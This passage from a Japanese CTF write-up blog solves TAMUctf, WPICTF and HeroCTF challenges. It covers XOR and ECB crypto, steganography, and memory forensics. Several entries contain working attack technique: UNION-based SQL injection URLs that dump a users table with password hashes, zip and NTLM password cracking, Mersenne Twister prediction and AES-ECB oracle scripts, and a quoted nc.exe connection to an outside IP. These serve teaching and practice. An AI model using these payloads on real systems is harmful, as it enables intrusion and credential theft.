And it makes a firery ring
Bound by wild desire
I fell in to a ring of fire
I fell into a burning ring of fire
I went down, down, down
And the flames went higher
And it burns, burns, burns
The ring of fire
The ring of fire
I fell into a burning ring of fire
I went down, down, down
And the flames went higher
And it burns, burns, burns
The ring of fire
The ring of fire
The taste of love is sweet
When hearts like ours meet
I fell for you like a child
Oh, but the fire went wild
I fell in to a burning ring of fire
I went down, down, down
And the flames went higher
And it burns, burns, burns
The ring of fire
The ring of fire
'''

pt = ''
for i in range(len(ct)):
    pt += chr(ord(ct[i]) ^ ord(key[i]))
print pt

復号した結果は以下の通り。

John R. Cash (born J. R. Cash; February 26, 1932 – September 12, 2003) was an American singer, songwriter, musician, and actor. Much of Cash's music contained themes of sorrow, moral tribulation, and redemption, especially in the later stages of his career. gigem{x0r_is_c0mmuT4T1ve}. He was known for his deep, calm bass-baritone voice, the distinctive sound of his Tennessee Three backing band characterized by train-like chugging guitar rhythms, a rebelliousness coupled with an increasingly somber and humble demeanor, free prison concerts, and a trademark all-black stage wardrobe which earned him the nickname "The Man in Black".

文章の中にフラグが含まれていた。

gigem{x0r_is_c0mmuT4T1ve}

Spectral Imaging (Sigint 100)

Audacityで開き、スペクトグラムを見る。
f:id:satou-y:20210503084636p:plain

gigem{4ud10-m4d3-v15u4L}

Unzip (Forensics 100)

$ fcrackzip -u -D -p dict/rockyou.txt chall.zip 


PASSWORD FOUND!!!!: pw == hunter2
$ unzip -P hunter2 chall.zip 
Archive:  chall.zip
 extracting: flag.txt
$ cat flag.txt
gigem{d0esnt_looK_lik3_5t4rs_t0_M3}
gigem{d0esnt_looK_lik3_5t4rs_t0_M3}

API 2 : The SeQueL (Web 150)

https://shell.tamuctf.com/problem/49342/?name=Coneにアクセスすると、該当するデータが表示される。Codenameの部分一致でSQLを検索しているようだ。SQLインジェクションを試す。

■https://shell.tamuctf.com/problem/49342/?name=' union select 1 --
pq: each UNION query must have the same number of columns

■https://shell.tamuctf.com/problem/49342/?name=' union select 1,2 --
pq: each UNION query must have the same number of columns

■https://shell.tamuctf.com/problem/49342/?name=' union select 1,2,3 --
pq: each UNION query must have the same number of columns

■https://shell.tamuctf.com/problem/49342/?name=' union select 1,2,3,4 --
pq: each UNION query must have the same number of columns

■https://shell.tamuctf.com/problem/49342/?name=' union select 1,2,3,4,5 --
pq: UNION types character varying and integer cannot be matched

カラム数は5個で良さそう。一旦文字列にしてみる。

■https://shell.tamuctf.com/problem/49342/?name=' union select '1','2','3','4','5' --
pq: invalid input value for enum contlevel: "3"

■https://shell.tamuctf.com/problem/49342/?name=' union select '1','2',3,'4','5' --
pq: UNION types contlevel and integer cannot be matched

3の場所はenumで、用意されている文字列のどれかでないといけないようだ。

■https://shell.tamuctf.com/problem/49342/?name=Z' union select '1','2','thaumiel','3','4' --
Codename : 2
ID : 1
SCP Containment: thaumiel
3

これで準備は整ったので、データを探してみる。

■https://shell.tamuctf.com/problem/49342/?name=Z' union select '1',datname,'thaumiel','3','4' from pg_database --
Codename : scpfoundation
ID : 1
SCP Containment : thaumiel
3
Card image
Codename : template0
ID : 1
SCP Containment : thaumiel
3
Card image
Codename : postgres
ID : 1
SCP Containment : thaumiel
3
Card image
Codename : template1
ID : 1
SCP Containment : thaumiel
3

■https://shell.tamuctf.com/problem/49342/?name=Z' union select '1',table_catalog,'thaumiel',table_name,'4' from information_schema.tables where table_catalog = 'scpfoundation' --
Codename : scpfoundation
ID : 1
SCP Containment : thaumiel
pg_cast
Card image
Codename : scpfoundation
ID : 1
SCP Containment : thaumiel
pg_user
Card image
Codename : scpfoundation
ID : 1
SCP Containment : thaumiel
pg_init_privs
Card image
    :
ID : 1
SCP Containment : thaumiel
pg_opfamily
Card image
Codename : scpfoundation
ID : 1
SCP Containment : thaumiel
pg_extension
Card image

■https://shell.tamuctf.com/problem/49342/?name=Z' union select '1',table_name,'thaumiel',column_name,'4' from information_schema.columns where table_name = 'experiments' --
Codename : experiments
ID : 1
SCP Containment : thaumiel
description
Card image
Codename : experiments
ID : 1
SCP Containment : thaumiel
id
Card image
Codename : experiments
ID : 1
SCP Containment : thaumiel
codename
Card image
Codename : experiments
ID : 1
SCP Containment : thaumiel
img
Card image
Codename : experiments
ID : 1
SCP Containment : thaumiel
containment

■https://shell.tamuctf.com/problem/49342/?name=Z' union select id,codename,containment,description,'4' from experiments --
Codename : Teddy
ID : 2
SCP Containment : euclid
To please the teddy, one must offer them a sacrifice of your finest tea
Card image
Codename : Gnomial
ID : 4
SCP Containment : thaumiel
If encountered in the wild do not make eye contact. They only become more aggressive.
Card image
Codename : Ą̷̡̺̼̗͉̦̦̝̰̲͍͍͖͚̌̓̅̈͐̀̌̀̾̾͘̚̚̚͘̕d̴̻͓̫̭͎͙̮̲͖̭̖̬̦͉͗͒̈́̉̐͋͗̈́̑̄̉̍͑͘ͅd̸̛̙̮͚̩̦̘̗͛͛̓̂̀́̽̒͂͊́̚i̷̡̫͖͎͖͕͎͋̃̀̅̽̾͋͑̿́́͝͝ṡ̵̲̤̥̲̣͚̥̠̍ơ̸̼̒͊̏̅̀̽̿̊̅̈́͊̃̑̓͂͘ṅ̶̢̡͙̣̝̹͓̯̤͉̌̎͜ͅ
ID : 5
SCP Containment : apollyon
H̵̢̩̺̞̥̮̱̤̗̱̹͓̱͔͕̱̔̂̄̇̑̿̚͝Ė̵͍͔̈̂̑̃́̎̿͊͝͝ͅ ̴̢̛̣̦̽̃̿͠I̵̱͚͕͇̱̮͛͑̋́͐̔̓̑͂͘͠ͅS̷̪̝̲̫̝͙͓͒̇͂̍͗̍͐͜ ̷̪̹͕͙͍̭͎̖̺̘̈́̒̍Ȁ̷͚͇̘͓͓Ḽ̴̢̝̗̥̜̭̹̪͉͎̀̿̽R̴̛̗̾̌̂̌̉͊́͋̏E̷̛͉͍̫͆͂͐̍̏͆͒͊̌̚̕͜͝Ā̶̧̛̛̭̬͎̩̭̬̪̩̦̦͚͙̹̳̅̆͌̑͋̎̄͆̒͜͜ͅD̷̨̼̙̣̲̱͎̘̺͎͕̩͉̳̪̲͉̒̐͌̅͌͂͑͠Y̶̬͚̜̰͕̦̝̝͗͌͂͛́͊̈́̐̽̔͒̔͛͐̕͠ ̷͓͔͓̭̞̏̔́̄̋̍̎̽̎͒̈́́̇̊̕͠͠H̶̦̮̿̍͌̀̂̂͌̚̕Ẽ̶̢̛̦͖̖̪̖̬̜̭̄̎̋̎̄̓͒͌̄͌̽́̈R̷̨̢̡̨̖̩͈͖̺̤̳̜̼̱̭̩̤̈́̄̊̌̐̐̕̕͝ͅE̸̡̡̩͓͓̣̲̜͚̖̊̈́͊͒̓͘͜
Card image
Codename : Default
ID : 1
SCP Containment : safe
default testing icon
Card image
Codename : Traffic Cone #88192
ID : 3
SCP Containment : neutralized
We believe they appear from interdimensional rifts with no clear origin

■https://shell.tamuctf.com/problem/49342/?name=Z' union select '1',table_name,'thaumiel',column_name,'4' from information_schema.columns where table_name = 'users' --
Codename : users
ID : 1
SCP Containment : thaumiel
name
Card image
Codename : users
ID : 1
SCP Containment : thaumiel
id
Card image
Codename : users
ID : 1
SCP Containment : thaumiel
status
Card image
Codename : users
ID : 1
SCP Containment : thaumiel
password

■https://shell.tamuctf.com/problem/49342/?name=Z' union select id,name,'thaumiel',password,'4' from users --
Codename : teddy
ID : 2
SCP Containment : thaumiel
e2ec2b31abe380b989ff057aef66377a
Card image
Codename : admin
ID : 3
SCP Containment : thaumiel
gigem{SQL_1nj3ct1ons_c4n_b3_fun}
Card image
Codename : glenn
ID : 1
SCP Containment : thaumiel
9651cbc7c0b5fb1a81f2858a07813c82

usersテーブルのadminユーザのパスワードにフラグがあった。

gigem{SQL_1nj3ct1ons_c4n_b3_fun}

simple_cipher (Reversing 150)

Ghidraでデコンパイルする。

undefined8 main(int param_1,long param_2)

{
  byte bVar1;
  int iVar2;
  int iVar3;
  int iVar4;
  size_t sVar5;
  void *__ptr;
  int local_28;
  
  if (param_1 < 2) {
    puts("./simple_cipher <plaintext>");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  sVar5 = strlen(*(char **)(param_2 + 8));
  iVar2 = (int)sVar5;
  __ptr = malloc((long)iVar2);
  srand(0x1337);
  local_28 = 0;
  while (local_28 < iVar2) {
    bVar1 = *(byte *)((long)((local_28 + 0xf) % iVar2) + *(long *)(param_2 + 8));
    iVar3 = rand();
    iVar4 = rand();
    *(byte *)((long)__ptr + (long)local_28) = bVar1 ^ (byte)iVar3 ^ (byte)iVar4;
    local_28 = local_28 + 1;
  }
  printf("%s",__ptr);
  free(__ptr);
  return 0;
}

暗号処理の概要は以下のようになっている。

・srand(0x1337)
・平文の各文字について以下の処理を行う。
 ・0xfバイトシフト
 ・rand()を2回実行し、両方の結果とXORをとる。

まず必要な乱数だけ取得する。

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void main() {
    int r;

    srand(0x1337);
    for (int i; i<68; i++) {
        r = rand();
        printf("%d\n", r & 0xff);
    }
}

実行結果は以下の通り。

37
46
34
215
193
114
215
110
179
42
163
241
248
234
240
176
87
213
232
226
11
127
8
77
207
216
0
232
251
141
107
33
187
141
248
124
255
208
234
178
250
141
163
242
119
147
163
207
105
139
177
116
10
186
193
217
146
194
194
141
79
45
174
10
186
167
134
185

このことを前提に復号する。

r = [37, 46, 34, 215, 193, 114, 215, 110, 179, 42, 163, 241, 248, 234, 240,
    176, 87, 213, 232, 226, 11, 127, 8, 77, 207, 216, 0, 232, 251, 141, 107,
    33, 187, 141, 248, 124, 255, 208, 234, 178, 250, 141, 163, 242, 119, 147,
    163, 207, 105, 139, 177, 116, 10, 186, 193, 217, 146, 194, 194, 141, 79,
    45, 174, 10, 186, 167, 134, 185]

with open('flag.enc', 'rb') as f:
    enc = f.read()

l = len(enc)
flag = [''] * l
for i in range(l):
    code = r[i*2] ^ r[i*2+1] ^ ord(enc[i])
    flag[(i + 15) % l] = chr(code)
flag = ''.join(flag)
print flag
gigem{d0n7_wr173_y0ur_0wn_c1ph3r5}

WPICTF 2021 Writeup

この大会は2021/4/24 7:00(JST)~2021/4/26 7:00(JST)に開催されました。
今回もチームで参戦。結果は200点で246チーム中136位でした。
自分で解けた問題をWriteupとして書いておきます。

Baby's First Reversing (Reversing 50)

バイナリエディタで見ると、pycのフォーマットのようだった。デコンパイルしてみる。

$ mv mhm mhm.pyc
$ uncompyle6 mhm.pyc
# uncompyle6 version 3.7.4
# Python bytecode 3.8 (3413)
# Decompiled from: Python 3.6.9 (default, Jan 26 2021, 15:33:00) 
# [GCC 8.4.0]
# Embedded file name: uhhhhhhh.py
# Compiled at: 2021-03-05 08:04:38
# Size of source mod 2**32: 1222 bytes


def __main__(inp):
    i = -4
    for c in inp:
        if i == 4:
            if c != ' ':
                exit(82)
            else:
                if i == -4:
                    if c != 'W':
                        exit(133)
                    else:
                        if i == -2:
                            if c != 'I':
                                exit(42069)
                            elif i == -1 and c != '{':
                                exit(11037)
                            if i == 10:
                                if c != '}':
                                    exit(9001)
                        else:
                            if i == 1:
                                if c != '@':
                                    exit(11037)
                            if i == 2 and c != '5':
                                exit(11037)
                        if i == 7 and c != 'P':
                            exit(11037)
                    if i == 3:
                        if c != 'E':
                            exit(11037)
                else:
                    if i == 0:
                        if c != 'h':
                            exit(82)
                    if i == 5 and c != 'h':
                        exit(11037)
                if i == -3 and c != 'P':
                    exit(133)
            if i == 9:
                if c != '!':
                    exit(133)
        else:
            if i == 6:
                if c != '0':
                    exit(133)
            if i == 8 and c != '3':
                exit(133)
        i += 1
    else:
        print(':)')


__main__(input('hi'))
# okay decompiling mhm.pyc

この条件から、input文字列を組み立てる。

WPI{h@5E h0P3!}

glute (Stego 150)

バイナリで見てみると、pdfが入っていることがわかる。foremostで取り出す。

$ foremost glute.png 
Processing: glute.png
|*|

PDFにフラグが書いてある。
f:id:satou-y:20210502200537p:plain

WPI{P0lyGlOtz_R_koo1}

HeroCTF v3 Writeup

この大会は2021/4/24 5:00(JST)~2021/4/26 9:00(JST)に開催されました。
今回もチームで参戦。結果は5546点で645チーム中3位でした。
自分で解けた問題をWriteupとして書いておきます。

Discord (Misc 1)

Discordに入り、#announcementsチャネルのルールを記載しているところにフラグが書いてあった。

Hero{3njoy_th3_3v3nt}

Record (Misc 15)

ドメイン heroctf.fr について何か見つける問題。DNSのTXTレコードを見てみる。

$ dig heroctf.fr TXT

; <<>> DiG 9.11.3-1ubuntu1.14-Ubuntu <<>> heroctf.fr TXT
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32787
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;heroctf.fr.			IN	TXT

;; ANSWER SECTION:
heroctf.fr.		5	IN	TXT	"v=spf1 mx a -all"
heroctf.fr.		5	IN	TXT	"Hero{cl34rtXt_15_b4d}"

;; Query time: 265 msec
;; SERVER: 127.0.0.53#53(127.0.0.53)
;; WHEN: Sat Apr 24 13:42:56 JST 2021
;; MSG SIZE  rcvd: 102

フラグが設定されていた。

Hero{cl34rtXt_15_b4d}

PRo Random Guesser (Prog 50)

次の数値を推測する問題だが、問題文に"Mersenne"というワードが入っている。Mersenne Twisterの問題のようだ。624個のランダム値を入手し、次の値を予測する。

import socket
import random

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

def untemper(rand):
    rand ^= rand >> 18;
    rand ^= (rand << 15) & 0xefc60000;
 
    a = rand ^ ((rand << 7) & 0x9d2c5680);
    b = rand ^ ((a << 7) & 0x9d2c5680);
    c = rand ^ ((b << 7) & 0x9d2c5680);
    d = rand ^ ((c << 7) & 0x9d2c5680);
    rand = rand ^ ((d << 7) & 0x9d2c5680);
 
    rand ^= ((rand ^ (rand >> 11)) >> 11);
    return rand

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('chall0.heroctf.fr', 7003))

N = 624
state = []
for i in range(N):
    data = recvuntil(s, ': ')
    print data + '1'
    s.sendall('1\n')
    data = recvuntil(s, '\n').rstrip()
    print data
    state.append(untemper(int(data.split(' ')[3])))

state.append(N)
random.setstate([3, tuple(state), None])

guess = str(random.getrandbits(32))
data = recvuntil(s, ': ')
print data + guess
s.sendall(guess + '\n')
data = recvuntil(s, '\n').rstrip()
print data

実行結果は以下の通り。

        :
Guess me : 1
Nop, it was 2855423616 :) But you can try again

Guess me : 1
Nop, it was 973691288 :) But you can try again

Guess me : 1
Nop, it was 1603588550 :) But you can try again

Guess me : 1
Nop, it was 1025656036 :) But you can try again

Guess me : 1
Nop, it was 3190350390 :) But you can try again

Guess me : 44888449
how can you be so lucky... here you go... Hero{n0t_s0_r4nd0m_4ft3r_4ll}
Hero{n0t_s0_r4nd0m_4ft3r_4ll}

Puzzle Me (Prog 100)

20000個のpngファイルがあるが、すべて先頭3, 4バイト目が壊れている。修正すると15x15の画像の断片になっているようだった。先頭3バイト目が数値にすると、0~199、先頭4バイト目が数値にすると、0~99なので、先頭3バイト目が横の位置、先頭4バイト目が縦の位置を示していると推測できる。以上をもとに画像を復元する。

import os
from PIL import Image
from Crypto.Util.number import *

def fix_png_save(data):
    save_data = data[:2]
    save_data += 'NG'
    save_data += data[4:]
    with open('tmp.png', 'wb') as f:
        f.write(save_data)

WIDTH_NUM = 200
HEIGHT_NUM = 100
UNIT_SIZE = 15
WIDTH = UNIT_SIZE * WIDTH_NUM
HEIGHT = UNIT_SIZE * HEIGHT_NUM

output_img = Image.new('RGB', (WIDTH, HEIGHT), (255, 255, 255))

DIR = './pieces/'

files = os.listdir(DIR)
for file in files:
    fname = DIR + file
    with open(fname, 'rb') as f:
        data = f.read()
    x = bytes_to_long(data[2])
    y = bytes_to_long(data[3])
    fix_png_save(data)
    input_img = Image.open('tmp.png').convert('RGB')
    output_img.paste(input_img, ((x * UNIT_SIZE), (y * UNIT_SIZE)))
    os.remove('tmp.png')

output_img.save('flag.png')

f:id:satou-y:20210430074531p:plain

Hero{PuZzzZZzzzZzzzzL3}

We need you 1/5 (Forensic 50)

PCのメモリが添付されているので、PCの名前を答える問題。

$ volatility -f capture.mem imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/capture.mem)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82780c28L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82781c00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2021-04-19 17:30:00 UTC+0000
     Image local date and time : 2021-04-19 19:30:00 +0200

$ volatility -f capture.mem --profile=Win7SP1x86_23418 hivelist
Volatility Foundation Volatility Framework 2.6.1
Virtual    Physical   Name
---------- ---------- ----
0x8b0a1008 0x6b1ed008 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0x8b12d008 0x697f4008 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0x9b1d89c8 0x79a459c8 \SystemRoot\System32\Config\SECURITY
0x9fee59c8 0x3c8ab9c8 \??\C:\Users\Razex\ntuser.dat
0x9fefc008 0x6fd89008 \??\C:\Users\Razex\AppData\Local\Microsoft\Windows\UsrClass.dat
0x823859c8 0x2b5d99c8 \SystemRoot\System32\Config\SAM
0x8940c5e8 0x2d5415e8 [no name]
0x8941a2c0 0x2d58d2c0 \REGISTRY\MACHINE\SYSTEM
0x89441008 0x2d436008 \REGISTRY\MACHINE\HARDWARE
0x894ca4c8 0x5fa804c8 \SystemRoot\System32\Config\DEFAULT
0x895975c0 0x2d4165c0 \Device\HarddiskVolume1\Boot\BCD
0x8a5fb008 0x13776008 \SystemRoot\System32\Config\SOFTWARE
0x8b04e9c8 0x3e6ad9c8 \??\C:\System Volume Information\Syscache.hve

SYSTEMのレジストリ情報からコンピュータ名を取得する。

$ volatility -f capture.mem --profile=Win7SP1x86_23418 printkey -o 0x8941a2c0 -K 'ControlSet001\Control\ComputerName\ComputerName'
Volatility Foundation Volatility Framework 2.6.1
Legend: (S) = Stable   (V) = Volatile

----------------------------
Registry: \REGISTRY\MACHINE\SYSTEM
Key name: ComputerName (S)
Last updated: 2021-04-19 17:00:09 UTC+0000

Subkeys:

Values:
REG_SZ                        : (S) mnmsrvc
REG_SZ        ComputerName    : (S) KANNIBAL
Hero{KANNIBAL}

We need you 2/5 (Forensic 75)

1/5 の続き。ユーザ名とパスワードを答える問題。

$ volatility -f capture.mem --profile=Win7SP1x86_23418 hivelist
Volatility Foundation Volatility Framework 2.6.1
Virtual    Physical   Name
---------- ---------- ----
0x8b0a1008 0x6b1ed008 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0x8b12d008 0x697f4008 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0x9b1d89c8 0x79a459c8 \SystemRoot\System32\Config\SECURITY
0x9fee59c8 0x3c8ab9c8 \??\C:\Users\Razex\ntuser.dat
0x9fefc008 0x6fd89008 \??\C:\Users\Razex\AppData\Local\Microsoft\Windows\UsrClass.dat
0x823859c8 0x2b5d99c8 \SystemRoot\System32\Config\SAM
0x8940c5e8 0x2d5415e8 [no name]
0x8941a2c0 0x2d58d2c0 \REGISTRY\MACHINE\SYSTEM
0x89441008 0x2d436008 \REGISTRY\MACHINE\HARDWARE
0x894ca4c8 0x5fa804c8 \SystemRoot\System32\Config\DEFAULT
0x895975c0 0x2d4165c0 \Device\HarddiskVolume1\Boot\BCD
0x8a5fb008 0x13776008 \SystemRoot\System32\Config\SOFTWARE
0x8b04e9c8 0x3e6ad9c8 \??\C:\System Volume Information\Syscache.hve

SAMとSYSTEMからパスワードのハッシュ情報を取得する。

$ volatility -f capture.mem --profile=Win7SP1x86_23418 hashdump -y 0x8941a2c0 -s 0x823859c8 > hash.txt
Volatility Foundation Volatility Framework 2.6.1
$ cat hash.txt
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invit:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Razex:1000:aad3b435b51404eeaad3b435b51404ee:78d9c7e905c695087ee3baa755ce43e4:::

ユーザ名はRazex。CrackStationでパスワードをクラックする。

78d9c7e905c695087ee3baa755ce43e4 → liverpoolfc123
Hero{Razex:liverpoolfc123}

We need you 3/5 (Forensics 80)

2/5 の続き。感染マシンへの接続に使うIPアドレスとポート番号を答える問題。

$ volatility -f capture.mem --profile=Win7SP1x86_23418 cmdscan
Volatility Foundation Volatility Framework 2.6.1
**************************************************
CommandProcess: conhost.exe Pid: 1672
CommandHistory: 0x3d14a8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 20 LastAdded: 19 LastDisplayed: 19
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x58
Cmd #0 @ 0x3c8040: cd Documents
Cmd #1 @ 0x3ce390: dir
Cmd #2 @ 0x3c8068: cd "Ma musique"
Cmd #3 @ 0x3ce3c0: dir
Cmd #4 @ 0x3c7428: clear
Cmd #5 @ 0x3ce3e0: dir
Cmd #6 @ 0x3c7440: cd ..
Cmd #7 @ 0x3ce3f0: dir
Cmd #8 @ 0x3c7458: clear
Cmd #9 @ 0x3cd560: cd Malw4r3
Cmd #10 @ 0x3ce400: dir
Cmd #11 @ 0x3b1de8: ./nc.exe-lvp 4444
Cmd #12 @ 0x3d69c0: ./nc.exe -lvp 4444
Cmd #13 @ 0x3d6620: nc.exe -lvp 4444
Cmd #14 @ 0x3cd5a0: ipconfig
Cmd #15 @ 0x3d6f00: nc.exe -lvp 4444
Cmd #16 @ 0x3d6f98: nc.exe 146.59.156.82 4444
Cmd #17 @ 0x3d6650: nc.exe -lvp 4444
Cmd #18 @ 0x3cd580: ipconfig
Cmd #19 @ 0x3d6fd8: nc.exe 146.59.156.82 4444
Cmd #36 @ 0x3a00c4: =?=?:???:
Cmd #37 @ 0x3cd038: =?;?????:?:

**************************************************
CommandProcess: conhost.exe Pid: 1672
CommandHistory: 0x3d6b00 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x84
Hero{146.59.156.82:4444}

HolyAbbot (Steganography 15)

添付されているテキストは以下のようになっている。

Dans son règne, Dans la béatitude
À tout jamais Dans son règne
Dans son royaume Irrévocablement
Dans son royaume Dans la béatitude
Dans son royaume Irrévocablement
Toujours En paradis

http://www.jellevy.com/Classes/terminale/Arithmetique/Exercices/exo7_codage_term.htmlにあるアルファベット対応表を参考に置き換える。

su
bs
ti
tu
ti
on
Hero{substitution}

Nice PDF (Steganography 20)

PDFファイルが添付されている。本文をコピペすると、以下のようになる。

DansHseseHistoires,rl'historienogrec{HérodoteErapporte4ainsiSuneYanecdote_quiPeutDlieuFau}mo-ment de la seconde guerre médique. En 484 av. J.-C., Xerxès Ier, roi des Perses, décide de préparer une armée gigantesque pour envahir la Grèce (Livre VII, 5-19). Quatre ans plus tard, lorsqu'il lance l'offensive, les Grecs sont depuis longtemps au courant de ses intentions. C'est que Démarate, ancien roi de Sparte réfugié auprès de Xerxès, a appris l'existence de ce projet et décide de transmettre l'information à Sparte (Livre VII, 239) :
« il prit une tablette double, en gratta la cire, puis écrivit sur le bois même les projets de Xerxès ; ensuite il recouvrit de cire son message : ainsi le porteur d'une tablette vierge ne risquait pas d'ennuis. »
Un autre passage de la même oeuvre fait également référence à la stéganographie : au paragraphe 35 du livre V, Histiée incite son gendre Aristagoras, gouverneur de Milet, à se révolter contre son roi, Darius, et pour ce faire,
« il fit raser la tête de son esclave le plus fidèle, lui tatoua son message sur le crâne et attendit que les cheveux eussent repoussé ; quand la chevelure fut redevenue normale, il fit partir l'esclave pour Milet. »
En Chine, on écrivait le message sur de la soie, qui ensuite était placée dans une petite boule recouverte de cire. Le messager avalait ensuite cette boule.
Dès le ier siècle av. J.-C., Pline l'Ancien décrit comment réaliser de l'encre invisible (ou « encre sympathique »). Les enfants de tous les pays s'amusent à le faire en écrivant avec du lait ou du jus de citron : le passage de la feuille écrite sous une source chaude (fer à repasser chaud, flamme de bougie...) révèle le message.
Durant la Seconde Guerre mondiale, les agents allemands utilisaient la technique du micropoint de Zapp, qui consiste à réduire la photo d'une page en un point d'un millimètre ou même moins. Ce point est ensuite placé dans un texte normal. Le procédé est évoqué dans une aventure de Blake et Mortimer, S.O.S. Météores. Il reçoit aussi une belle illustration dans le film de Claude Pinoteau, Le Silencieux.
Un couple célèbre d'artistes de music-hall des années 1960, Myr et Myroska, communiquait les yeux bandés, en apparence par « transmission de pensée » et, en réalité, par un astucieux procédé stéganographique à base de phrases codées (dont, en particulier, des variantes de la phrase : « Myroska, êtes-vous avec moi ? »).

最初の部分はPDFの見た目は "Dans"のあとスペースがあり、"ses"となっていて、"H"が隠れていたことがわかる。この隠れていた文字を取り出していく。

Hero{E4SY_PDF}

ShakePng (Steganography 30)

PNGファイルが添付されている。IHDRチャンクと、IENDチャンクが真ん中あたりにあり、順序がおかしいので、TweakPNGで直す。
f:id:satou-y:20210430080406p:plain

HERO{SH4K3_UR_PNG}

Subliminal (Steganography 95)

aviのフレームは720あり、画像の高さも720。各フレームで行単位で上から順にサブリミナルで別画像になっている。AVI2JPGで各フレームの画像をPNGファイルとして切り出し、1行ずれていることに注意し別画像を結合する。

from PIL import Image

WIDTH = 1280
HEIGHT = 720
IFILE_FORMAT = './div/subliminal_challenge %07d.png'

output_img = Image.new('RGB', (WIDTH, HEIGHT), (255, 255, 255))

for h in range(1, HEIGHT):
    filename = IFILE_FORMAT % (h + 1)
    input_img = Image.open(filename).convert('RGB')
    for w in range(WIDTH):
        rgb = input_img.getpixel((w, h - 1))
        output_img.putpixel((w, h - 1), rgb)

output_img.save('flag.png')

f:id:satou-y:20210430080822p:plain

Hero{Fr4gM3nt3D_1m4Ge}

h4XOR (Crypto 75)

XORで暗号化している。鍵の長さは9バイト。PNGのヘッダはわかっているので、それをもとに鍵を割り出し、復号する。

with open('flag.png.enc', 'rb') as f:
    enc = f.read()

PNG_HEAD = '\x89PNG\x0d\x0a\x1a\x0a\x00'

key = []
for i in range(9):
    key.append(ord(PNG_HEAD[i]) ^ ord(enc[i]))

flag = ''
for i in range(len(enc)):
    flag += chr(ord(enc[i]) ^ key[i%len(key)])

with open('flag.png', 'wb') as f:
    f.write(flag)

復号したPNG画像にフラグが書いてあった。
f:id:satou-y:20210430081002p:plain

Hero{123_xor_321}

ExtractMyBlocks (Crypto 125)

入力した文字列を含め、フラグを含む文字列をAES-ECBで暗号化している。フラグを1文字ずつはみ出させ、比較する方式でフラグを割り出すことができる。

$ nc chall0.heroctf.fr 10000
[SUPPORT] Password Reset
Please enter your account ID : a
faa78fc293fd67a74dcebc00776135ba6b56599461bccda5c67456a60fac0b7833442e3bca75e7a54eccc4158ff9a3f48eb3dfb48b35155a8f5f19d5737da232

$ nc chall0.heroctf.fr 10000
[SUPPORT] Password Reset
Please enter your account ID : aa
d833bbdd43688c0a61e40eb25576e8fa6c73dd874dac7b6f803e159954a72c3da2c2dea5af93a42e4a5a740e4373091a1ebd13214f780906876e00a7f40e0916

$ nc chall0.heroctf.fr 10000
[SUPPORT] Password Reset
Please enter your account ID : aaa
d833bbdd43688c0a61e40eb25576e8fa399accd507443f6aea1f607b9e75e1c03ae73ae8b401b91bbfd93dc12852cb86f7e83d7dd84753e2b6a8abacffc120b4

$ nc chall0.heroctf.fr 10000
[SUPPORT] Password Reset
Please enter your account ID : aaaa
d833bbdd43688c0a61e40eb25576e8fa7becc66c928d89c4fb252164a7cbbaa349092c169c14eae50b89e3da7288850f6e0c02b34bc172c299cbf19bb905cf24

$ nc chall0.heroctf.fr 10000
[SUPPORT] Password Reset
Please enter your account ID : aaaaa
d833bbdd43688c0a61e40eb25576e8fa32ee7f792df9ecfcaca00e1b6b8fa11db79f1fc3a01b076ebfa9a2edb96fa5f2ad6bed10ff950694f77d3fc3813304d8

$ nc chall0.heroctf.fr 10000
[SUPPORT] Password Reset
Please enter your account ID : aaaaaa
d833bbdd43688c0a61e40eb25576e8faf01612ce888c4a12606e83e7445aff2da9aaa40033e7eb3876bd3ada845e75110c1707afb9a404ca4a392e7c82ee445279035c8bfd4a239bfc4a1d207ae1f423

改行を"_"と表すと以下のようなイメージになる。

0123456789abcdef
_Welcome back aa
aaaa !__Your pas
sword : FFFFFFFF
FFFFFFF_Regards_
PPPPPPPPPPPPPPPP

0123456789abcdef
_Welcome back aa
our password : ?
aaaaaaaaaaaaaaaa
aaaaaaaaaaa !__Y
our password : F
FFFFFFFFFFFFFF_R
egards_PPPPPPPPP
import socket

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

TEXT = '_Your password : '

flag = ''
for i in range(15):
    for code in range(32, 127):
        id = TEXT[-17+i:] + flag + chr(code) + 'a' * (27 - i)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('chall0.heroctf.fr', 10000))
        data = recvuntil(s, ': ')
        print data + id
        s.sendall(id + '\n')
        data = recvuntil(s, '\n').rstrip()
        print data
        if data[32*1:32*2] == data[32*4:32*5]:
            flag += chr(code)
            break

print flag

実行結果は以下の通り。

        :
Please enter your account ID :  : Hero{_BL0CK5_}|aaaaaaaaaaaaa
